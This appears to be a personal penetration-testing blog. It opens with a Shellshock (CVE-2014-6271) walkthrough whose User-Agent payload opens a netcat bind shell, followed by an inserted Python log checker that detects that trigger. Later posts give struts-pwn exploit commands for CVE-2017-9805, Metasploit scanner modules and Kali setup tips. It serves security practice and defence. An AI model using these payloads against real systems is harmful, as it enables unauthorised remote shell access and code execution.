when practicing pen testing on CVE-2014-6271
In Burp Suite, send the captured request from Proxy to Repeater and modify the User-Agent header:
GET / HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh
Repeater will not return a response, because the target is now waiting for a connection on port 9999.
Open another prompt and launch netcat to connect to port 9999:
nc xxx.xxx.xxx.xxx 9999
You are now at the /bin/sh prompt of the compromised system and can type a command such as "whoami".
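From the defender's side, the same request leaves a recognisable trace in the web server's access log. The following Python checker is an added example, not code from the original post: it parses Apache combined-format log lines and flags the "() {" trigger in the User-Agent field shown above, and goes slightly beyond the post by also checking the Referer field, since a CGI handler exports that header to the environment (as HTTP_REFERER) in the same way. The sample log lines, the LOG_RE and SHELLSHOCK_RE patterns and the find_shellshock() function are constructed for this example.

```python
import re

# Constructed sample Apache "combined" access log lines (not from the original post).
# Line 1 carries the post's User-Agent payload, line 2 is benign, and line 3 puts a
# trigger in the Referer field, which a CGI handler also exports as HTTP_REFERER.
SAMPLE_LOG = """\
203.0.113.5 - - [23/Dec/2018:10:01:02 +0000] "GET / HTTP/1.1" 200 612 "-" "() { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh"
203.0.113.6 - - [23/Dec/2018:10:01:03 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.7 - - [23/Dec/2018:10:01:04 +0000] "GET /cgi-bin/status HTTP/1.1" 500 0 "() { :; }; echo test" "curl/7.58.0"
"""

# Apache combined log format; quoted fields may contain \" escapes.
QUOTED = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>' + QUOTED + r')" '
    + r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>' + QUOTED + r')" '
    + r'"(?P<agent>' + QUOTED + r')"$'
)

# The vulnerable bash importer acted on values beginning with "() {"; the regex
# tolerates extra whitespace so lightly varied payloads are still flagged.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')

# Request headers that CGI turns into environment variables (HTTP_USER_AGENT,
# HTTP_REFERER), so these are the logged fields worth inspecting.
CHECKED_FIELDS = ("agent", "referer")


def find_shellshock(log_text):
    """Return one dict per (line, field) whose value contains the trigger."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; a real tool would count these
        for field in CHECKED_FIELDS:
            value = m.group(field)
            if SHELLSHOCK_RE.search(value):
                hits.append({"line": lineno, "ip": m.group("ip"),
                             "request": m.group("request"), "field": field, "value": value})
    return hits


if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print("line {line}: {ip} {request!r} -> {field}={value!r}".format(**hit))
```

Run against a real access log, each hit gives the source IP and the offending header value, which is what you would feed into an alert or block list.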
Sunday, December 23, 2018
CVE-2014-6271 walk through
CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE
I found this GitHub page extremely useful when practicing pen testing on CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE
https://github.com/mazen160/struts-pwn_CVE-2017-9805
Check if the vulnerability exists against a single URL.
python struts-pwn.py --url 'http://example.com/struts2-rest-showcase/orders/3'
Exploit a single URL.
python struts-pwn.py --exploit --url 'http://example.com/struts2-rest-showcase/orders/3' -c 'touch /tmp/struts-pwn'
kali metasploit website auxiliary modules
use auxiliary/scanner/http/dir_listing
use auxiliary/scanner/http/dir_scanner
use auxiliary/scanner/http/files_dir
list all nmap scripts available
to see all the nmap scripts available, list this directory:
ls /usr/share/nmap/scripts/
vmware tools kali linux vmplayer
if you have Kali Linux and VMware Tools isn't working in VMplayer, follow these instructions
http://www.vmwarearena.com/how-to-install-vmware-tools-on-kali-linux/
basically
1.) in vmplayer, manage -> install vmware tools
2.) open cd rom in kali
3.) copy .tar.gz to kali
4.) extract the .tar.gz
5.) run the vmware-install.pl
6.) choose all the defaults
7.) boom, vmware tools works again (like copy & paste to/from host)
dirbuster wordlist folder location
If you need a wordlist of directories for the DirBuster tool, they are located here on a default Kali install:
/usr/share/wordlists/dirbuster/
Saturday, December 22, 2018
apt-get update fails on Kali KEYEXPIRED
if apt-get update fails on Kali with an error like this:
Get:1 http://kali.download/kali kali-rolling InRelease [30.5 kB]
Err:1 http://kali.download/kali kali-rolling InRelease
The following signatures were invalid: KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136
Fetched 30.5 kB in 8s (3,483 B/s)
Reading package lists... Done
W: An error occurred during the signature verification. The repository is not updated and the previous index files will be used. GPG error: http://kali.download/kali kali-rolling InRelease: The following signatures were invalid: KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136
W: Failed to fetch http://http.kali.org/kali/dists/kali-rolling/InRelease The following signatures were invalid: KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136
W: Some index files failed to download. They have been ignored, or old ones used instead.
The fix appears to be these two commands, which fetch and install the new archive keyring package:
wget https://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2018.1_all.deb
apt install ./kali-archive-keyring_2018.1_all.deb